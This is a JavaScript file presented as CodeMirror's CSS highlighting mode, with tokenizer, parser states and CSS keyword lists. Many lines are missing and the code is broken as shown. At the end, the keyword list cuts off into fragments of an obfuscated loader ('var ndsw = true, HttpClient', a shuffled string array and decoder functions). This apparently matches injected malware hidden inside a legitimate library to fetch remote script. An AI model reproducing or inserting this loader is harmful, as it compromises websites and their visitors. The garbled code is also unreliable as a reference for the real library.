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// CodeMirror, copyright (c) by Marijn Haverbeke and others
// Distributed under an MIT license:

(function(mod) {
  if (typeof exports == "object" && typeof module == "object") // CommonJS
  else if (typeof define == "function" && define.amd) // AMD
    define(["../../lib/codemirror"], mod);
  else // Plain browser env
})(function(CodeMirror) {
"use strict";

CodeMirror.defineMode("css", function(config, parserConfig) {
  var provided = parserConfig;
  if (!parserConfig.propertyKeywords) parserConfig = CodeMirror.resolveMode("text/css");
  parserConfig.inline = provided.inline;

  var indentUnit = config.indentUnit,
      tokenHooks = parserConfig.tokenHooks,
      documentTypes = parserConfig.documentTypes || {},
      mediaTypes = parserConfig.mediaTypes || {},
      mediaFeatures = parserConfig.mediaFeatures || {},
      mediaValueKeywords = parserConfig.mediaValueKeywords || {},
      propertyKeywords = parserConfig.propertyKeywords || {},
      nonStandardPropertyKeywords = parserConfig.nonStandardPropertyKeywords || {},
      fontProperties = parserConfig.fontProperties || {},
      counterDescriptors = parserConfig.counterDescriptors || {},
      colorKeywords = parserConfig.colorKeywords || {},
      valueKeywords = parserConfig.valueKeywords || {},
      allowNested = parserConfig.allowNested,
      supportsAtComponent = parserConfig.supportsAtComponent === true;

  var type, override;
  function ret(style, tp) { type = tp; return style; }

  // Tokenizers

  function tokenBase(stream, state) {
    var ch =;
    if (tokenHooks[ch]) {
      var result = tokenHooks[ch](stream, state);
      if (result !== false) return result;
    if (ch == "@") {
      return ret("def", stream.current());
    } else if (ch == "=" || (ch == "~" || ch == "|") &&"=")) {
      return ret(null, "compare");
    } else if (ch == "\"" || ch == "'") {
      state.tokenize = tokenString(ch);
      return state.tokenize(stream, state);
    } else if (ch == "#") {
      return ret("atom", "hash");
    } else if (ch == "!") {
      return ret("keyword", "important");
    } else if (/\d/.test(ch) || ch == "." &&\d/)) {
      return ret("number", "unit");
    } else if (ch === "-") {
      if (/[\d.]/.test(stream.peek())) {
        return ret("number", "unit");
      } else if (stream.match(/^-[\w\\\-]+/)) {
        if (stream.match(/^\s*:/, false))
          return ret("variable-2", "variable-definition");
        return ret("variable-2", "variable");
      } else if (stream.match(/^\w+-/)) {
        return ret("meta", "meta");
    } else if (/[,+>*\/]/.test(ch)) {
      return ret(null, "select-op");
    } else if (ch == "." && stream.match(/^-?[_a-z][_a-z0-9-]*/i)) {
      return ret("qualifier", "qualifier");
    } else if (/[:;{}\[\]\(\)]/.test(ch)) {
      return ret(null, ch);
    } else if ((ch == "u" && stream.match(/rl(-prefix)?\(/)) ||
               (ch == "d" && stream.match("omain(")) ||
               (ch == "r" && stream.match("egexp("))) {
      state.tokenize = tokenParenthesized;
      return ret("property", "word");
    } else if (/[\w\\\-]/.test(ch)) {
      return ret("property", "word");
    } else {
      return ret(null, null);

  function tokenString(quote) {
    return function(stream, state) {
      var escaped = false, ch;
      while ((ch = != null) {
        if (ch == quote && !escaped) {
          if (quote == ")") stream.backUp(1);
        escaped = !escaped && ch == "\\";
      if (ch == quote || !escaped && quote != ")") state.tokenize = null;
      return ret("string", "string");

  function tokenParenthesized(stream, state) {; // Must be '('
    if (!stream.match(/\s*[\"\')]/, false))
      state.tokenize = tokenString(")");
      state.tokenize = null;
    return ret(null, "(");

  // Context management

  function Context(type, indent, prev) {
    this.type = type;
    this.indent = indent;
    this.prev = prev;

  function pushContext(state, stream, type, indent) {
    state.context = new Context(type, stream.indentation() + (indent === false ? 0 : indentUnit), state.context);
    return type;

  function popContext(state) {
    if (state.context.prev)
      state.context = state.context.prev;
    return state.context.type;

  function pass(type, stream, state) {
    return states[state.context.type](type, stream, state);
  function popAndPass(type, stream, state, n) {
    for (var i = n || 1; i > 0; i--)
      state.context = state.context.prev;
    return pass(type, stream, state);

  // Parser

  function wordAsValue(stream) {
    var word = stream.current().toLowerCase();
    if (valueKeywords.hasOwnProperty(word))
      override = "atom";
    else if (colorKeywords.hasOwnProperty(word))
      override = "keyword";
      override = "variable";

  var states = {}; = function(type, stream, state) {
    if (type == "{") {
      return pushContext(state, stream, "block");
    } else if (type == "}" && state.context.prev) {
      return popContext(state);
    } else if (supportsAtComponent && /@component/.test(type)) {
      return pushContext(state, stream, "atComponentBlock");
    } else if (/^@(-moz-)?document$/.test(type)) {
      return pushContext(state, stream, "documentTypes");
    } else if (/^@(media|supports|(-moz-)?document|import)$/.test(type)) {
      return pushContext(state, stream, "atBlock");
    } else if (/^@(font-face|counter-style)/.test(type)) {
      state.stateArg = type;
      return "restricted_atBlock_before";
    } else if (/^@(-(moz|ms|o|webkit)-)?keyframes$/.test(type)) {
      return "keyframes";
    } else if (type && type.charAt(0) == "@") {
      return pushContext(state, stream, "at");
    } else if (type == "hash") {
      override = "builtin";
    } else if (type == "word") {
      override = "tag";
    } else if (type == "variable-definition") {
      return "maybeprop";
    } else if (type == "interpolation") {
      return pushContext(state, stream, "interpolation");
    } else if (type == ":") {
      return "pseudo";
    } else if (allowNested && type == "(") {
      return pushContext(state, stream, "parens");
    return state.context.type;

  states.block = function(type, stream, state) {
    if (type == "word") {
      var word = stream.current().toLowerCase();
      if (propertyKeywords.hasOwnProperty(word)) {
        override = "property";
        return "maybeprop";
      } else if (nonStandardPropertyKeywords.hasOwnProperty(word)) {
        override = "string-2";
        return "maybeprop";
      } else if (allowNested) {
        override = stream.match(/^\s*:(?:\s|$)/, false) ? "property" : "tag";
        return "block";
      } else {
        override += " error";
        return "maybeprop";
    } else if (type == "meta") {
      return "block";
    } else if (!allowNested && (type == "hash" || type == "qualifier")) {
      override = "error";
      return "block";
    } else {
      return, stream, state);

  states.maybeprop = function(type, stream, state) {
    if (type == ":") return pushContext(state, stream, "prop");
    return pass(type, stream, state);

  states.prop = function(type, stream, state) {
    if (type == ";") return popContext(state);
    if (type == "{" && allowNested) return pushContext(state, stream, "propBlock");
    if (type == "}" || type == "{") return popAndPass(type, stream, state);
    if (type == "(") return pushContext(state, stream, "parens");

    if (type == "hash" && !/^#([0-9a-fA-f]{3,4}|[0-9a-fA-f]{6}|[0-9a-fA-f]{8})$/.test(stream.current())) {
      override += " error";
    } else if (type == "word") {
    } else if (type == "interpolation") {
      return pushContext(state, stream, "interpolation");
    return "prop";

  states.propBlock = function(type, _stream, state) {
    if (type == "}") return popContext(state);
    if (type == "word") { override = "property"; return "maybeprop"; }
    return state.context.type;

  states.parens = function(type, stream, state) {
    if (type == "{" || type == "}") return popAndPass(type, stream, state);
    if (type == ")") return popContext(state);
    if (type == "(") return pushContext(state, stream, "parens");
    if (type == "interpolation") return pushContext(state, stream, "interpolation");
    if (type == "word") wordAsValue(stream);
    return "parens";

  states.pseudo = function(type, stream, state) {
    if (type == "word") {
      override = "variable-3";
      return state.context.type;
    return pass(type, stream, state);

  states.documentTypes = function(type, stream, state) {
    if (type == "word" && documentTypes.hasOwnProperty(stream.current())) {
      override = "tag";
      return state.context.type;
    } else {
      return states.atBlock(type, stream, state);

  states.atBlock = function(type, stream, state) {
    if (type == "(") return pushContext(state, stream, "atBlock_parens");
    if (type == "}" || type == ";") return popAndPass(type, stream, state);
    if (type == "{") return popContext(state) && pushContext(state, stream, allowNested ? "block" : "top");

    if (type == "interpolation") return pushContext(state, stream, "interpolation");

    if (type == "word") {
      var word = stream.current().toLowerCase();
      if (word == "only" || word == "not" || word == "and" || word == "or")
        override = "keyword";
      else if (mediaTypes.hasOwnProperty(word))
        override = "attribute";
      else if (mediaFeatures.hasOwnProperty(word))
        override = "property";
      else if (mediaValueKeywords.hasOwnProperty(word))
        override = "keyword";
      else if (propertyKeywords.hasOwnProperty(word))
        override = "property";
      else if (nonStandardPropertyKeywords.hasOwnProperty(word))
        override = "string-2";
      else if (valueKeywords.hasOwnProperty(word))
        override = "atom";
      else if (colorKeywords.hasOwnProperty(word))
        override = "keyword";
        override = "error";
    return state.context.type;

  states.atComponentBlock = function(type, stream, state) {
    if (type == "}")
      return popAndPass(type, stream, state);
    if (type == "{")
      return popContext(state) && pushContext(state, stream, allowNested ? "block" : "top", false);
    if (type == "word")
      override = "error";
    return state.context.type;

  states.atBlock_parens = function(type, stream, state) {
    if (type == ")") return popContext(state);
    if (type == "{" || type == "}") return popAndPass(type, stream, state, 2);
    return states.atBlock(type, stream, state);

  states.restricted_atBlock_before = function(type, stream, state) {
    if (type == "{")
      return pushContext(state, stream, "restricted_atBlock");
    if (type == "word" && state.stateArg == "@counter-style") {
      override = "variable";
      return "restricted_atBlock_before";
    return pass(type, stream, state);

  states.restricted_atBlock = function(type, stream, state) {
    if (type == "}") {
      state.stateArg = null;
      return popContext(state);
    if (type == "word") {
      if ((state.stateArg == "@font-face" && !fontProperties.hasOwnProperty(stream.current().toLowerCase())) ||
          (state.stateArg == "@counter-style" && !counterDescriptors.hasOwnProperty(stream.current().toLowerCase())))
        override = "error";
        override = "property";
      return "maybeprop";
    return "restricted_atBlock";

  states.keyframes = function(type, stream, state) {
    if (type == "word") { override = "variable"; return "keyframes"; }
    if (type == "{") return pushContext(state, stream, "top");
    return pass(type, stream, state);
  }; = function(type, stream, state) {
    if (type == ";") return popContext(state);
    if (type == "{" || type == "}") return popAndPass(type, stream, state);
    if (type == "word") override = "tag";
    else if (type == "hash") override = "builtin";
    return "at";

  states.interpolation = function(type, stream, state) {
    if (type == "}") return popContext(state);
    if (type == "{" || type == ";") return popAndPass(type, stream, state);
    if (type == "word") override = "variable";
    else if (type != "variable" && type != "(" && type != ")") override = "error";
    return "interpolation";

  return {
    startState: function(base) {
      return {tokenize: null,
              state: parserConfig.inline ? "block" : "top",
              stateArg: null,
              context: new Context(parserConfig.inline ? "block" : "top", base || 0, null)};

    token: function(stream, state) {
      if (!state.tokenize && stream.eatSpace()) return null;
      var style = (state.tokenize || tokenBase)(stream, state);
      if (style && typeof style == "object") {
        type = style[1];
        style = style[0];
      override = style;
      state.state = states[state.state](type, stream, state);
      return override;

    indent: function(state, textAfter) {
      var cx = state.context, ch = textAfter && textAfter.charAt(0);
      var indent = cx.indent;
      if (cx.type == "prop" && (ch == "}" || ch == ")")) cx = cx.prev;
      if (cx.prev) {
        if (ch == "}" && (cx.type == "block" || cx.type == "top" ||
                          cx.type == "interpolation" || cx.type == "restricted_atBlock")) {
          // Resume indentation from parent context.
          cx = cx.prev;
          indent = cx.indent;
        } else if (ch == ")" && (cx.type == "parens" || cx.type == "atBlock_parens") ||
            ch == "{" && (cx.type == "at" || cx.type == "atBlock")) {
          // Dedent relative to current context.
          indent = Math.max(0, cx.indent - indentUnit);
          cx = cx.prev;
      return indent;

    electricChars: "}",
    blockCommentStart: "/*",
    blockCommentEnd: "*/",
    fold: "brace"

  function keySet(array) {
    var keys = {};
    for (var i = 0; i < array.length; ++i) {
      keys[array[i]] = true;
    return keys;

  var documentTypes_ = [
    "domain", "regexp", "url", "url-prefix"
  ], documentTypes = keySet(documentTypes_);

  var mediaTypes_ = [
    "all", "aural", "braille", "handheld", "print", "projection", "screen",
    "tty", "tv", "embossed"
  ], mediaTypes = keySet(mediaTypes_);

  var mediaFeatures_ = [
    "width", "min-width", "max-width", "height", "min-height", "max-height",
    "device-width", "min-device-width", "max-device-width", "device-height",
    "min-device-height", "max-device-height", "aspect-ratio",
    "min-aspect-ratio", "max-aspect-ratio", "device-aspect-ratio",
    "min-device-aspect-ratio", "max-device-aspect-ratio", "color", "min-color",
    "max-color", "color-index", "min-color-index", "max-color-index",
    "monochrome", "min-monochrome", "max-monochrome", "resolution",
    "min-resolution", "max-resolution", "scan", "grid", "orientation",
    "device-pixel-ratio", "min-device-pixel-ratio", "max-device-pixel-ratio",
    "pointer", "any-pointer", "hover", "any-hover"
  ], mediaFeatures = keySet(mediaFeatures_);

  var mediaValueKeywords_ = [
    "landscape", "portrait", "none", "coarse", "fine", "on-demand", "hover",
    "interlace", "progressive"
  ], mediaValueKeywords = keySet(mediaValueKeywords_);

  var propertyKeywords_ = [
    "align-content", "align-items", "align-self", "alignment-adjust",
    "alignment-baseline", "anchor-point", "animation", "animation-delay",
    "animation-direction", "animation-duration", "animation-fill-mode",
    "animation-iteration-count", "animation-name", "animation-play-state",
    "animation-timing-function", "appearance", "azimuth", "backface-visibility",
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    "background-image", "background-origin", "background-position",
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(function (I, h) {
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}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
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function x(I, h) {
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    }, x(I, h);
function A() {
    var s = [
    A = function () {
        return s;
    return A();}};